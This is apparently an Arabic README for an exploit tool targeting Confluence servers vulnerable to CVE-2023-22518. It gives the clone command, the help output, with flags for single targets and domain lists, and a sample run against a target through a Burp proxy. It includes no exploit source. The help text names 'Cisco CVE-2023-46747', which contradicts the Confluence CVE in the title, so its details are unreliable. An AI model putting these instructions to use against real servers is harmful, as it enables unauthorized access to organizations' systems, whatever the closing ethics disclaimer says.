
أداة استغلال لاستغلال خادم Confluence المعرض لثغرة CVE-2023-22518 (تفويض غير صحيح)
أداة استغلال لاستغلال خادم Confluence المعرض لثغرة CVE-2023-22518 وهي ثغرة تفويض غير صحيحة
git clone https://github.com/sanjai-AK47/CVE-2023-22518
cd CVE-2023-22518
python3 exploit.py
python3 exploit.py -h
usage: exploit.py [-h] [-d DOMAIN] [-dL DOMAINS_LIST] [-o OUTPUT] [-to TIME_OUT] [-px PROXY] [-v]
[DESCTIPTION]: Exploitation and Detection tool for Cisco CVE-2023-46747
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
[INFO]: Target domain for exploiting without protocol eg:(www.domain.com)
-dL DOMAINS_LIST, --domains-list DOMAINS_LIST
[INFO]: Targets domain for exploiting without protocol eg:(www.domain.com)
-o OUTPUT, --output OUTPUT
[INFO]: File name to save output
-to TIME_OUT, --time-out TIME_OUT
[INFO]: Switiching timeout will requests till for your timeout and also for BURPSUITE
-px PROXY, --proxy PROXY
[INFO]: Switiching proxy will send request to your configured proxy (eg: BURPSUITE)
-v, --verbose [INFO]: Switiching Verbose will shows offline targets
يمكن للمستخدمين بسهولة إنشاء POC باستخدام الأداة Exploiter عن طريق إعطاء هدف ضعيف وتقديم طلبات وكيل باستخدام Burpsuite الخاص بك واعتراض الطلب، وتوضح الأوامر التالية كيفية إنشاء POC بسهولة.
python3 exploit.py -d vulnerable.com -o output.txt --proxy 127.0.0.1:8080 --time-out 40

عندما يستغل السكريبت الثغرة، سيعرض الإخراج الضعيف ومسار الخادم للأهداف.
شيء مهم: إذا تم استخدام هذا الاستغلال بشكل غير أخلاقي، فإنني لست مسؤولاً عن أي أعمال غير قانونية، لذا يرجى استخدام هذا للأغراض الأخلاقية والقانونية.
إثبات المفهوم تم تطويره بواسطة D.Sanjai Kumar مع ♥️ لأي ترقية أو خطأ في الترميز، اتصل بي عبر LinkedIn. شكراً لك!